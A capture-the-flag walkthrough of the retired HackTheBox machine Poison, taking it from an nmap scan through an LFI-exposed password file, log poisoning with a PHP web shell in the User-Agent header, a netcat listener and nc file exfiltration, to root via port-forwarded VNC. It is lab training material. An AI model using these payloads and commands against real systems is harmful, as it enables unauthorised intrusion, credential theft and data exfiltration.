Poison HackTheBox WalkThrough
This is Poison HackTheBox machine walkthrough and is also the 20th
machine of our OSCP like HTB boxes
series. In this writeup, I have demonstrated step-by-step how I rooted to Poison HTB
machine in two different ways. Before starting let us know something about this machine. It is a FreeBSD
box with IP address 10.10.10.84
and difficulty medium
assigned by its maker.
This machine is currently retired
so you will require VIP
subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Poison machine by pinging IP 10.10.10.84. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-
Scanning
$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84
$ cat nmap/Poison.nmap
Nmap
found ports 22 and 80 as open. OpenSSH
on pot 22
and Apache2
webserver on port 80
are running. Enumeration on port 22 is useless here because OpenSSH 7.2
has not much vulnerability that can give us some information to help in further enumeration. So I began my enumeration from port 80. Also, port 80 has more attack surface to enumerate on than port 22. Ongoing to URL http://10.10.10.84/ found a website made entirely from HTML and php.
There are many php scripts given. After entering listfiles.php
script into Scriptname
field and submitting I found an array that contains many number of files. This array also contains a file pwdbackup.txt
.
When I accessed this file using the URL view source:http://10.10.10.84/browse.php?file=pwdbackup.txt it contains some base64 encoded
characters along with a message it is encoded at least 13 times.
When I tried to decode it I got a password. To decode it, firstly copy whole encoded password in a file and then decode it 13 times.
$ nano encoded-passwd
$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d
After decoding I got password Charix!2#4%6&8(0
. Didn’t know whose password it is. We would try this password to login into SSH when we get some username. After some enumeration I got LFI
vulnerability
at URL http://10.10.10.84/browse.php?file=/etc/passwd. For more clear view check it’s source code as it is given in the screenshot. The passwd
file revealed two users root
and charix
have shell. When I tried to SSH into charix account using the decoded credential I could easily logged in. So here our credential is charix
: Charix!2#4%6&8(0
.
Let us SSH into charix’s account.
Getting User Shell via SSH ~ Method 1
$ ssh [email protected]
~Charix!2#4%6&8(0
% whoami && id
We have successfully got user shell. Let us capture user flag.
Capture User Flag
% cat user.txt
Getting User Shell via Log Poisoning ~ Method 2
We have successfully got user flag
. I am also going to get shell in other way and that one is probably the intended way. That is, by Log Poisoning
and I think this is the reason the name of the Box is Poison
. Before going further we should know what is log poisoning? So, when an attacker get LFI vulnerability he tries to upgrade it to RCE
so that this attack can be more successful. For this he uses multiple techniques to get RCE and log poisoning is one of them. In Log poisoning an attacker attempts to inject malicious input to the server log and tries to access the log file via LFI vulnerability.
Since log file
contains information of User-Agent
and only user-agent header can be controlled by an attacker so he tries to replace the user-agent with his own php code
as shown in below Request (this request is from http://10.10.10.84 ) . After sending the request when he checks log file he will find output of that code in it. For more info on LFI to RCE
check this link.
We can access log file of Poison Web Server at URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see our php code is executed and hello
is printed in the log.
Now let us include a cmd
variable in our php code through which we can execute OS command
to get Reverse Shell. Replace User-Agent
with the following php code.
<?php system($_GET['cmd']) ?>
and forward the request from the Repeater.
Confirming RCE
We can access URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in browser to execute OS command. Simply replace id
with required OS command and you will get its result at the bottom of this page. We can confirm this by the result of $id
command at the bottom.
We have successfully confirmed RCE via log poisoning
. To get reverse shell start netcat
listener on your kali machine in one window and execute the following URL either in web browser or open it through $curl
command as shown below.
Getting Reverse Shell
$ nc -nvlp 1234
$ whoami && id
We have successfully got user shell. So this was the intended way to get into the box. Now exit this shell and login into SSH using creds charix
: Charix!2#4%6&8(0
to get privilege escalation.
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege to root.
Finding PrivEsc Vector
At some initial enumeration I got a secret.zip
file inside charix
home directory. Then copied this file to my Kali machine so that I could unzip
it and analyze its content. When I tried to extract this file it asked for password then entered Charix!2#4%6&8(0
and it extracted successfully. After extraction got a file secret
. It is an extended-ASCII
file. On checking its content with $cat
it shows some unreadable characters. Didn’t know exactly what is use of this file. We will check this file later and would see where we will need this file.
Copying File locally to Kali Machine
% cat secret.zip | nc 10.10.14.16 1234
#On Poison Machine
$ nc -l -p 1234 > secret.zip < /dev/null
#On Kali Machine
$ unzip secret.zip
~Charix!2#4%6&8(0
On checking LISTENING
port on Poison machine I found port 5801
& 5901
are running locally. After some googling found 5801 & 5901 are VNC
ports, for remote desktop access.
% netstat -an | grep "LISTEN"
Then confirmed Xvnc
process is running using $ps
command. Xvnc is a VNC server. This VNC server is running using root privilege. So here our potential PrivEsc vector can be using VNC.
% ps -aux | grep vnc
Since VNC connect to GUI Desktop
so it is not possible to get GUI VNC shell through terminal. We have to local port forward
port 5901 to our Kali machine to use VNC shell.
Local Port Forwarding
$ ssh -L 5901:127.0.0.1:5901 [email protected]
# To perform Local Port Forwarding
~Charix!2#4%6&8(0
$ ss -lnpt
# Check listening port on your Kali machine
When I tried to connect to $vncviewer
using the secret
file at port 5901 it opened a VNC Desktop
as you can see in the screenshot and that too with root user access. So we have successfully escalated the privilege to root. Let us capture root flag.
$ vncviewer -passwd secret 127.0.0.1:5901
Capture root Flag
# whoami
# hostname
# id
# ls
# cat root.txt
This was how I rooted to Poison HackTheBox machine. Hope you have learnt something new from this machine walkthrough. Thanks for reading this article. For any query and suggestion related to walkthrough feel free to write us at [email protected].